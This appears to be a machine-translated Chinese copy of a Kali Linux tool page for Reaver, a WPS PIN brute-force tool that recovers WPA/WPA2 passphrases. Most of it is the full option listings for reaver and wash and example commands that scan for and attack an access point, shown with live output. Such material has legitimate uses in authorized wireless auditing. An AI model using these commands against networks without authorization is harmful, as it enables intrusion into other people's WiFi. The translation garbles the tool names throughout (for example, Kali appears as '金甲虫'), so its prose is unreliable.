掠夺者包装说明
掠夺者实现对WiFi保护设置(WPS)注册商的PIN暴力攻击,以恢复WPA / WPA2密码短语,如http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf描述。
掠夺者已被设计为针对WPS一健壮和实际的攻击,并且经测试对多种接入点和WPS实现。
平均而言,掠夺者会恢复目标AP的纯文本WPA / WPA2密钥在4-10小时,这取决于接入点。在实践中,一般会一半的时间来猜测正确的WPS PIN和恢复密码
资料来源:https://code.google.com/p/reaver-wps/
金甲虫首页 | 卡利掠夺者回购
- 作者:战术网络解决方案,克雷格Heffner
- 许可:GPL第二版
包含在金甲虫包工具
掠夺者 - WiFi保护设置攻击工具
[email protected]:~# reaver -h
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]
Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv洗 - WiFi保护设置扫描工具
[email protected]:~# wash -h
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-h, --help Show help
Example:
wash -i mon0洗用法示例
扫描使用的监控模式接口(-i MON0)通道6 网(C6),而忽略帧校验和错误(-C):
[email protected]:~# wash -i mon0 -c 6 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
E0:3F:49:6A:57:78 6 -73 1.0 No ASUS金甲虫用法示例
使用监控模式接口(-i MON0)攻击接入点(-b E0:3F:49:6A:57:78),显示详细输出(-v):
[email protected]:~# reaver -i mon0 -b E0:3F:49:6A:57:78 -v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from E0:3F:49:6A:57:78
[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
[+] Trying pin 12345670